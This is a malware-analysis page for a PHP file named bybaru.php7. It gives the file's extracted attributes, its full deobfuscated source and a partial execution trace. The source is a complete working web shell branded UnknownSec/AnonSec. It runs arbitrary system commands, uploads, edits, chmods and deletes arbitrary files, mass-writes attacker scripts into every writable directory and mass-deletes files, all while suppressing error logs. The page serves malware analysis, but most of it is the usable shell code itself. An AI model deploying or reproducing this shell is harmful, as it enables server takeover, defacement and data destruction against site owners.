PHP Malware Analysis
bybaru.php7
md5: 45d782a2606610499cc853bfe62877d6
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- unknownsec1337@gmail.com (Deobfuscated, Original)
Environment
- error_reporting (Deobfuscated, Original, Traces)
- getcwd (Deobfuscated, Original, Traces)
- php_uname (Deobfuscated, Original)
- set_time_limit (Deobfuscated, Original, Traces)
Execution
- exec (Deobfuscated, Original)
- shell_exec (Deobfuscated, Original)
Files
- copy (Deobfuscated, Original)
- file_get_contents (Deobfuscated, Original)
- file_put_contents (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Title
- " . $_SERVER['HTTP_HOST'] . " - {$▛} 403 (Deobfuscated)
- ".$_SERVER['HTTP_HOST']." - $▛ 403 (Original)
- localhost - UnknownSec 403 (HTML)
URLs
- ftp.sh/AnonSec.jpg (Deobfuscated, Original)
- ftp.sh/main/style.css (Deobfuscated, HTML, Original)
Deobfuscated PHP code
/* ~ Mau recode? izin dulu, recode ga izin itu ga keren ajg
~ V.02
~ Thanks to all mem AnonSec Team and all friend.
~ Untuk beberapa tools gw ambil dari indoxploit, karena tidak semuanya gw otakin sendiri.
*/
<?php
set_time_limit(0);
error_reporting(0);
@ini_set('error_log', null);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
$▛ = 'UnknownSec';
$▘ = "<style>table{display:none;}</style>";
if (isset($_GET['option']) && $_POST['opt'] == 'download') {
header('Content-type: text/plain');
header('Content-Disposition: attachment; filename="' . $_POST['name'] . '"');
echo file_get_contents($_POST['path']);
exit;
}
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
function ▟($dir, $p)
{
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>" . $p . "</font>";
} else {
return "<font color='red'>" . $p . "</font>";
}
}
function dc($dir, $p)
{
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>" . $p . "</font>";
} else {
return "<font color='red'>" . $p . "</font>";
}
}
function ip()
{
$ipas = '';
if (getenv('HTTP_CLIENT_IP')) {
$ipas = getenv('HTTP_CLIENT_IP');
} else {
if (getenv('HTTP_X_FORWARDED_FOR')) {
$ipas = getenv('HTTP_X_FORWARDED_FOR');
} else {
if (getenv('HTTP_X_FORWARDED')) {
$ipas = getenv('HTTP_X_FORWARDED');
} else {
if (getenv('HTTP_FORWARDED_FOR')) {
$ipas = getenv('HTTP_FORWARDED_FOR');
} else {
if (getenv('HTTP_FORWARDED')) {
$ipas = getenv('HTTP_FORWARDED');
} else {
if (getenv('REMOTE_ADDR')) {
$ipas = getenv('REMOTE_ADDR');
} else {
$ipas = 'IP tidak dikenali';
}
}
}
}
}
}
return $ipas;
}
function ekse()
{
$cmd = "whoami";
$return = "";
$output = "";
$methodArray = array();
//exec()
$return = "";
$output = "";
exec($cmd, $output, $return);
if (strlen($output[0]) > 0 && true) {
$methodArray[] = "exec";
}
//shell_exec()
$return = "";
$output = "";
$output = shell_exec($cmd);
if (strlen($output) > 0) {
$methodArray[] = "shell_exec";
}
return $methodArray;
}
function ekseCMD($cmd, $method)
{
if ($method == "") {
ob_start();
$methodArray = ekse();
ob_end_clean();
if (is_array($methodArray)) {
$method = $methodArray[0];
}
}
switch ($method) {
case "exec":
exec($cmd, $output);
var_dump($output);
break;
case "shell_exec":
echo shell_exec($cmd);
break;
}
}
$cmd = htmlspecialchars($_POST["cmd"]);
$method = htmlspecialchars($_POST["execCMD"]);
function p($file)
{
$p = fileperms($file);
if (($p & 0xc000) == 0xc000) {
$i = 's';
} elseif (($p & 0xa000) == 0xa000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
} else {
$i = 'u';
}
$i .= $p & 0x100 ? 'r' : '-';
$i .= $p & 0x80 ? 'w' : '-';
$i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-');
$i .= $p & 0x20 ? 'r' : '-';
$i .= $p & 0x10 ? 'w' : '-';
$i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-');
$i .= $p & 0x4 ? 'r' : '-';
$i .= $p & 0x2 ? 'w' : '-';
$i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-');
return $i;
}
echo "\r\n<!DOCTYPE HTML>\r\n<html>\r\n\t<head>\r\n\t\t<meta name='author' content='{$▛}'>\r\n\t\t<meta name='robots' content='NOINDEX, NOFOLLOW'>\r\n\t\t<title>" . $_SERVER['HTTP_HOST'] . " - {$▛} 403</title>\r\n\t\t<meta name='viewport' content='width=device-width, initial-scale=0.70, user-scalable=no'>\r\n\t\t<link rel='stylesheet' href='//unknownsec.ftp.sh/main/style.css'>\r\n\t\t<script src='//maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>\r\n\t\t<script src='//cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/7.33.1/sweetalert2.min.js'></script>\r\n\t</head>\r\n<body class='bg-secondary text-light'>\r\n<div class='container-fluid'>\r\n\t<div class='py-3' id='main'>\r\n\t\t<div class='box shadow bg-dark p-4 rounded-3'>\r\n\t\t<a class='text-decoration-none text-light' href='" . $_SERVER['PHP_SELF'] . "'><h4>{$▛} Bypass <i class='bi bi-bug-fill'></i> 403</h4></a>";
if (isset($_GET['path'])) {
$path = $_GET['path'];
} else {
$path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo "<i class=\"bi bi-hdd-rack\"></i> : <a class=\"text-decoration-none text-light\" href=\"?path=/\">/</a>";
continue;
}
if ($pat == '') {
continue;
}
echo "<a class=\"text-decoration-none\" href=\"?path=";
for ($i = 0; $i <= $id; $i++) {
echo "{$paths[$i]}";
if ($i != $id) {
echo "/";
}
}
echo '">' . $pat . '</a>/';
}
echo " [ " . ▟($path, p($path)) . " ]";
echo "\r\n<div class='dropdown'>\r\n\t<button class='btn btn-outline-light dropdown-toggle btn-sm' type='button' id='dropdownMenuButton' data-toggle='dropdown' aria-haspopup='true' aria-expanded='false'><i class='bi bi-menu-down'></i> Menu</button>\r\n\t<div class='dropdown-menu'>\r\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=upload'><i class='bi bi-upload'></i> Upload</a>\r\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=depes'><i class='bi bi-exclamation-diamond'></i> Mass depes</a>\r\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=delete'><i class='bi bi-trash'></i> Mass delete</a>\r\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=cmd'><i class='bi bi-terminal'></i> Terminal</a>\r\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=info'><i class='bi bi-info-circle'></i> Info server</a>\r\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=about'><i class='bi bi-info'></i> About</a></h5>\r\n\t</div>\r\n</div>";
// tools nya
if (isset($_GET['dir'])) {
$dir = $_GET['dir'];
chdir($dir);
} else {
$dir = getcwd();
}
$dir = str_replace("\\", "/", $dir);
$scdir = explode("/", $dir);
for ($i = 0; $i <= $c_dir; $i++) {
$scdir[$i];
if ($i != $c_dir) {
} elseif ($_GET['id'] == 'depes') {
function mass_kabeh($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<font color=green>success</font>] {$▚}<br>";
file_put_contents($▚, $isi_script);
$▟ = mass_kabeh($dirc, $namafile, $isi_script);
}
}
}
}
}
}
function mass_biasa($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<font color=green>success</font>] {$dirb}/{$namafile}<br>";
file_put_contents($▚, $isi_script);
}
}
}
}
}
}
if ($_POST['start']) {
if ($_POST['tipe'] == 'massal') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
} elseif ($_POST['tipe'] == 'biasa') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
}
} else {
echo "<br />{$▘}\r\n<form method='post'>\r\n\t<b>Tipe:</b><br>\r\n<div class='custom-control custom-switch'>\r\n\t<input type='checkbox' id='customSwitch' class='custom-control-input' name='tipe' value='biasa'>\r\n\t<label class='custom-control-label' for='customSwitch'>Biasa</label>\r\n</div>\r\n<div class='custom-control custom-switch'>\r\n\t<input type='checkbox' id='customSwitch1' class='custom-control-input' name='tipe' value='massal'>\r\n\t<label class='custom-control-label' for='customSwitch1'>Massal</label>\r\n</div>\r\n\t<b><i class='bi bi-folder'></i> Lokasi:</b>\r\n\t<input class='form-control' type='text' name='d_dir' value='{$dir}' height='10'>\r\n\t<b><i class='bi bi-file-earmark'></i> File name:</b>\r\n\t<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'>\r\n\t<b><i class='bi bi-file-earmark'></i> Your script:</b>\r\n\t<textarea class='form-control' rows='7' name='script' placeholder='your secript here'></textarea><br />\r\n\t<input type='submit' name='start' value='Go' class='btn btn-outline-light'>\r\n</form>";
}
} elseif ($_GET['id'] == 'info') {
$disfunc = @ini_get("disable_functions");
if (empty($disfunc)) {
$disfc = "<font color=green>NONE</font>";
} else {
$disfc = "<font color=red>{$disfunc}</font>";
}
if (!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$sm = @ini_get(strtolower("safe_mode")) == 'on' ? "<font color=red>ON</font>" : "<font color=green>OFF</font>";
echo '<br />' . $▘ . '
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<b>Uname: </b><font color=green>" . php_uname() . "</font><br />";
echo "<b>Software: </b><font color=green>" . $_SERVER['SERVER_SOFTWARE'] . "</font><br />";
echo "<b>PHP version: </b><font color=green>PHP_VERSION</font> <b>PHP os:</b> <font color=green>PHP_OS</font><br />";
echo "<b>Server Ip: </b><font color=green>" . gethostbyname($_SERVER['HTTP_HOST']) . "</font><br />";
echo "<b>Your Ip: </b><font color=green>" . ip() . "</font><br />";
echo "<b>User: </b><font color=green>{$user}</font> ({$uid}) | <b>Group:</b> <font color=green>{$group}</font> ({$gid})<br />";
echo "<b>Safe Mode: </b>{$sm}<br />";
echo "<kbd>Disable Function:</kbd><pre>{$disfc}</pre>";
echo "</div>\r\n\t</div>\r\n</div>";
} elseif ($_GET['id'] == 'about') {
echo '<br />' . $▘ . '
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<img alt='AnonSec Team' class='img-thumbnail rounded mx-auto d-block' src='//unknownsec.ftp.sh/AnonSec.jpg' width='150px'>";
echo "<b>- About Me -</b><br />";
echo "Thanks bre dah pake shell nya, jika ada yang error silahkan hubungi email di bawah.<br />Greetz : <a href=''>{ AnonSec Team } - And You</a><br />My email: <a href='mailto:unknownsec1337@gmail.com'>unknownsec1337@gmail.com</a>";
echo "</div>\r\n\t</div>\r\n</div>";
} elseif ($_GET['id'] == 'cmd') {
echo "{$▘}<br>\r\n<form method='POST'>\r\n<div class='input-group mb-3'>\r\n\t<input class='form-control' type='text' name='cmd' value='{$cmd}'>\r\n\t<select class='bg-dark text-light form-control' name='execCMD'>\r\n\t\t<option>{$method}</option>";
ob_start();
$methodArray = ekse();
ob_end_clean();
foreach ($methodArray as $value) {
echo "<option>{$value}</option>";
}
echo "</select>\r\n\t</div>\r\n</form>";
if ($cmd == "") {
echo "\r\n<div class='card text-dark'>\r\n\t<div class='card-header'>\r\n\t\t<pre>";
ekseCMD("whoami", $method);
echo "</pre>\r\n\t</div>\r\n</div>";
} else {
echo "\r\n<div class='card text-dark'>\r\n\t<div class='card-header'>\r\n\t\t<pre><kbd>~\$ " . $cmd . "</kbd><br>";
ekseCMD($cmd, $method);
echo "</pre>\r\n\t</div>\r\n</div>";
}
} elseif ($_GET['id'] == 'upload') {
echo '<br />' . $▘ . '
<form action="" method="post" enctype="multipart/form-data">
<div class="input-group mb-3 text-center">
<input type="file" class="form-control form-control-sm" name="file">
<button type="submit" class="btn btn-outline-light btn-sm">Submit</button>
</div>
</form>';
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success upload",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed upload",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
}
} elseif ($_GET['id'] == 'delete') {
function hapus_massal($dir, $namafile)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
if (file_exists("{$dir}/{$namafile}")) {
unlink("{$dir}/{$namafile}");
}
} elseif ($dirb === '..') {
if (file_exists("" . dirname($dir) . "/{$namafile}")) {
unlink("" . dirname($dir) . "/{$namafile}");
}
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
if (file_exists($▚)) {
echo "[<font color=green>deleted</font>] {$▚}<br>";
unlink($▚);
$▟ = hapus_massal($dirc, $namafile);
}
}
}
}
}
}
}
if ($_POST['start']) {
echo "<div style='margin: 5px auto; padding: 5px'>";
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "</div>";
} else {
echo "<br />{$▘}\r\n<form method='post'>\r\n\t<b><i class='bi bi-folder'></i> Lokasi:</b>\r\n\t<input class='form-control' type='text' name='d_dir' value='{$dir}' height='10'>\r\n\t<b><i class='bi bi-file-earmark'></i> File name:</b>\r\n\t<div class='input-group mb-3'>\r\n\t<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'><br>\r\n\t<div class='input-group-append'>\r\n\t<input class='btn btn-outline-light' type='submit' name='start' value='Go'>\r\n</form>\r\n\t</div>\r\n\t</div>";
}
}
}
// akhir tools
if (isset($_GET['filesrc'])) {
echo "<br><b>name : </b>" . basename($_GET['filesrc']);
"</br>";
echo '<textarea class="form-control" rows="7" readonly> ' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</textarea><br />';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '<br><b>name : </b>' . basename($_POST['path']);
'</br>';
//Chmod
if ($_POST['opt'] == 'chmod') {
if (isset($_POST['perm'])) {
if (chmod($_POST['path'], $_POST['perm'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success Change Permission",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change permission",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
}
echo '<form method="POST">
<div class="input-group mb-3">
<input class="form-control" name="perm" type="text" value="' . substr(sprintf('%o', fileperms($_POST['path'])), -4) . '"/>
<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
<input class="form-control" type="hidden" name="opt" value="chmod">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
} elseif ($_GET['opt'] == 'btw') {
$cwd = getcwd();
echo '<form action="?option&path=' . $cwd . '&opt=delete&type=buat" method="POST">
<div class="input-group mb-3">
<input class="form-control" name="name" type="text" value="Folder"/>
<input class="form-control" type="hidden" name="path" value="' . $cwd . '">
<input class="form-control" type="hidden" name="opt" value="delete">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
} elseif ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success change name",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change name",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
<div class="input-group mb-3">
<input class="form-control" name="newname" type="text" value="' . $_POST['name'] . '" />
<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
<input class="form-control" type="hidden" name="opt" value="rename">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Edit file Success",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed edit file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
fclose($fp);
}
echo '<form method="POST">
<textarea class="form-control" rows="7" name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
<input class="form-control" type="hidden" name="opt" value="edit">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form><br />';
}
} else {
//delete dir
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['path'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete dir",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete dir",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['path'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete file",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
}
}
echo "</center>";
$scandir = scandir($path);
$pa = getcwd();
echo "<div class=\"table-responsive\">\r\n<table class=\"table table-hover table-dark text-light\">\r\n<thead>\r\n<tr>\r\n\t<td class=\"text-center\">Name</td>\r\n\t\t<td class=\"text-center\">Last edit</td>\r\n\t\t<td class=\"text-center\">Size</td>\r\n\t\t<td class=\"text-center\">Permission</td>\r\n\t<td class=\"text-center\">Options</td>\r\n</tr>\r\n</thead>\r\n<tbody class=\"text-nowrap\">";
foreach ($scandir as $dir) {
$dt = date("Y-m-d", filemtime("{$path}/{$dir}"));
if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
continue;
}
echo "\r\n\t<tr>\r\n\t<td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-secondary' href=\"?path={$path}/{$dir}\">{$dir}</a></td>\r\n\t<td><center>{$dt}</center></td>\r\n\t<td><center>DIR</center></td>\r\n\t<td><center>";
if (is_writable("{$path}/{$dir}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$path}/{$dir}")) {
echo "<font color=\"red\">";
}
echo p("{$path}/{$dir}");
if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
echo "</font>";
}
echo "</center></td>\r\n\t<td>\r\n<form method=\"POST\" action=\"?option&path={$path}\">\r\n<div class='input-group mb-3 text-center'>\r\n<select class=\"form-select form-select-sm\" name=\"opt\">\r\n\t<option selected disabled>Select</option>\r\n\t<option value=\"delete\">Delete</option>\r\n\t<option value=\"chmod\">Chmod</option>\r\n\t<option value=\"rename\">Rename</option>\r\n</select>\r\n\t<input type=\"hidden\" name=\"type\" value=\"dir\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\r\n\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\r\n\t\t<input class=\"btn btn-outline-light btn-sm\" type=\"submit\" value=\"Go\"/>\r\n\t</form>\r\n</div>\r\n</td>\r\n</tr>";
}
foreach ($scandir as $file) {
$ft = date("Y-m-d", filemtime("{$path}/{$file}"));
if (!is_file($path . '/' . $file)) {
continue;
}
$s = filesize($path . '/' . $file) / 1024;
$s = round($s, 3);
if ($s >= 1024) {
$s = round($s / 1024, 2) . ' MB';
} else {
$s .= ' KB';
}
echo "\r\n\t<tr>\r\n\t<td><i class='bi bi-file-earmark-code-fill'></i><a class='text-decoration-none text-secondary' href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td>\r\n\t<td><center>{$ft}</center></td>\r\n\t<td><center>{$s}</center></td>\r\n\t<td><center>";
if (is_writable("{$path}/{$file}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$path}/{$file}")) {
echo "<font color=\"red\">";
}
echo p("{$path}/{$file}");
if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
echo "</font>";
}
echo "</center></td>\r\n\t<td>\r\n<form method=\"POST\" action=\"?option&path={$path}\">\r\n<div class='input-group mb-3 text-center'>\r\n<select class=\"form-select form-select-sm\"name=\"opt\">\r\n\t<option selected disabled>Select</option>\r\n\t\t<option value=\"delete\">Delete</option>\r\n\t\t<option value=\"edit\">Edit</option>\r\n\t\t<option value=\"rename\">Rename</option>\r\n\t\t<option value=\"chmod\">Chmod</option>\r\n\t<option value=\"download\">Download</option>\r\n</select>\r\n<input type=\"hidden\" name=\"type\" value=\"file\">\r\n\t<input type=\"hidden\" name=\"name\" value=\"{$file}\">\r\n\t\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\r\n\t\t<input class=\"btn btn-outline-light btn-sm\" type=\"submit\" value=\"Go\"/>\r\n\t</form>\r\n</div>\r\n</td>\r\n</tr>";
}
}
echo "\r\n</tbody>\r\n</table>\r\n<div class='text-center'>\r\n\t<kbd>Copyright © " . date("Y") . " - {$▛}</kbd>\r\n</div>\r\n\t</div>\r\n\t\t</div>\r\n\t</div>\r\n</div>\r\n<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>\r\n<script src='//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js'></script>\r\n<script src='//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>\r\n</body>\r\n</html>";Execution traces
data/traces/45d782a2606610499cc853bfe62877d6_trace-1676240088.161.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:15:14.058790]
1 0 1 0.000184 393528
1 3 0 0.001004 521936 {main} 1 /var/www/html/uploads/bybaru.php7 0 0
2 4 0 0.001033 521936 set_time_limit 0 /var/www/html/uploads/bybaru.php7 8 1 0
2 4 1 0.001057 522000
2 4 R FALSE
2 5 0 0.001076 521968 error_reporting 0 /var/www/html/uploads/bybaru.php7 9 1 0
2 5 1 0.001096 522008
2 5 R 22527
2 6 0 0.001115 521968 ini_set 0 /var/www/html/uploads/bybaru.php7 10 2 'error_log' NULL
2 6 1 0.001159 522040
2 6 R ''
2 7 0 0.001177 521968 ini_set 0 /var/www/html/uploads/bybaru.php7 11 2 'log_errors' 0
2 7 1 0.001196 522040
2 7 R '1'
2 8 0 0.001214 521968 ini_set 0 /var/www/html/uploads/bybaru.php7 12 2 'max_execution_time' 0
2 8 1 0.001233 522008
2 8 R '0'
2 9 0 0.001250 521936 ini_set 0 /var/www/html/uploads/bybaru.php7 13 2 'output_buffering' 0
2 9 1 0.001269 522008
2 9 R FALSE
2 10 0 0.001286 521936 ini_set 0 /var/www/html/uploads/bybaru.php7 14 2 'display_errors' 0
2 10 1 0.001304 522008
2 10 R ''
1 A /var/www/html/uploads/bybaru.php7 16 $▛ = 'UnknownSec'
1 A /var/www/html/uploads/bybaru.php7 17 $▘ = '<style>table{display:none;}</style>'
2 11 0 0.001357 521936 get_magic_quotes_gpc 0 /var/www/html/uploads/bybaru.php7 26 0
2 11 1 0.001373 521936
2 11 R FALSE
2 12 0 0.001394 521936 htmlspecialchars 0 /var/www/html/uploads/bybaru.php7 115 1 NULL
2 12 1 0.001413 522128
2 12 R ''
1 A /var/www/html/uploads/bybaru.php7 115 $cmd = ''
2 13 0 0.001445 522096 htmlspecialchars 0 /var/www/html/uploads/bybaru.php7 116 1 NULL
2 13 1 0.001462 522288
2 13 R ''
1 A /var/www/html/uploads/bybaru.php7 116 $method = ''
2 14 0 0.001496 522256 getcwd 0 /var/www/html/uploads/bybaru.php7 175 0
2 14 1 0.001515 522304
2 14 R '/var/www/html/uploads'
1 A /var/www/html/uploads/bybaru.php7 175 $path = '/var/www/html/uploads'
2 15 0 0.001548 522304 str_replace 0 /var/www/html/uploads/bybaru.php7 177 3 '\\' '/' '/var/www/html/uploads'
2 15 1 0.001569 522400
2 15 R '/var/www/html/uploads'
1 A /var/www/html/uploads/bybaru.php7 177 $path = '/var/www/html/uploads'
2 16 0 0.001602 522304 explode 0 /var/www/html/uploads/bybaru.php7 178 2 '/' '/var/www/html/uploads'
2 16 1 0.001621 522880
2 16 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/bybaru.php7 178 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/bybaru.php7 179 $id = 0
1 A /var/www/html/uploads/bybaru.php7 181 $a = TRUE
1 A /var/www/html/uploads/bybaru.php7 179 $id = 1
1 A /var/www/html/uploads/bybaru.php7 187 $i = 0
1 A /var/www/html/uploads/bybaru.php7 187 $i++
1 A /var/www/html/uploads/bybaru.php7 187 $i++
1 A /var/www/html/uploads/bybaru.php7 179 $id = 2
1 A /var/www/html/uploads/bybaru.php7 187 $i = 0
1 A /var/www/html/uploads/bybaru.php7 187 $i++
1 A /var/www/html/uploads/bybaru.php7 187 $i++
1 A /var/www/html/uploads/bybaru.php7 187 $i++
1 A /var/www/html/uploads/bybaru.php7 179 $id = 3
1 A /var/www/html/uploads/bybaru.php7 187 $i = 0
1 A /var/www/html/uploads/bybaru.php7 187 $i++
1 A /var/www/html/uploads/bybaru.php7 187 $i++
1 A /var/www/html/uploads/bybaru.php7 187 $i++
1 A /var/www/html/uploads/bybaru.php7 187 $i++
1 A /var/www/html/uploads/bybaru.php7 179 $id = 4
1 A /var/www/html/uploads/bybaru.php7 187 $i = 0
1 A /var/www/html/uploads/bybaru.php7 187 $i++
1 A /var/www/html/uploads/bybaru.php7 187 $i++
1 A /var/www/html/uploads/bybaru.php7 187 $i++
1 A /var/www/html/uploads/bybaru.php7 187 $i++
1 A /var/www/html/uploads/bybaru.php7 187 $i++
2 17 0 0.001944 522808 p 1 /var/www/html/uploads/bybaru.php7 193 1 '/var/www/html/uploads'
3 18 0 0.001960 522808 fileperms 0 /var/www/html/uploads/bybaru.php7 119 1 '/var/www/html/uploads'
3 18 1 0.001983 522872
3 18 R 16895
2 A /var/www/html/uploads/bybaru.php7 119 $p = 16895
2 A /var/www/html/uploads/bybaru.php7 129 $i = 'd'
2 A /var/www/html/uploads/bybaru.php7 137 $i .= 'r'
2 A /var/www/html/uploads/bybaru.php7 138 $i .= 'w'
2 A /var/www/html/uploads/bybaru.php7 141 $i .= 'x'
2 A /var/www/html/uploads/bybaru.php7 142 $i .= 'r'
2 A /var/www/html/uploads/bybaru.php7 143 $i .= 'w'
2 A /var/www/html/uploads/bybaru.php7 146 $i .= 'x'
2 A /var/www/html/uploads/bybaru.php7 147 $i .= 'r'
2 A /var/www/html/uploads/bybaru.php7 148 $i .= 'w'
2 A /var/www/html/uploads/bybaru.php7 151 $i .= 'x'
2 17 1 0.002145 522872
2 17 R 'drwxrwxrwx'
2 19 0 0.002160 522872 ▟ 1 /var/www/html/uploads/bybaru.php7 193 2 '/var/www/html/uploads' 'drwxrwxrwx'
3 20 0 0.002175 522872 getcwd 0 /var/www/html/uploads/bybaru.php7 36 0
3 20 1 0.002188 522920
3 20 R '/var/www/html/uploads'
2 A /var/www/html/uploads/bybaru.php7 36 $▚ = '/var/www/html/uploads'
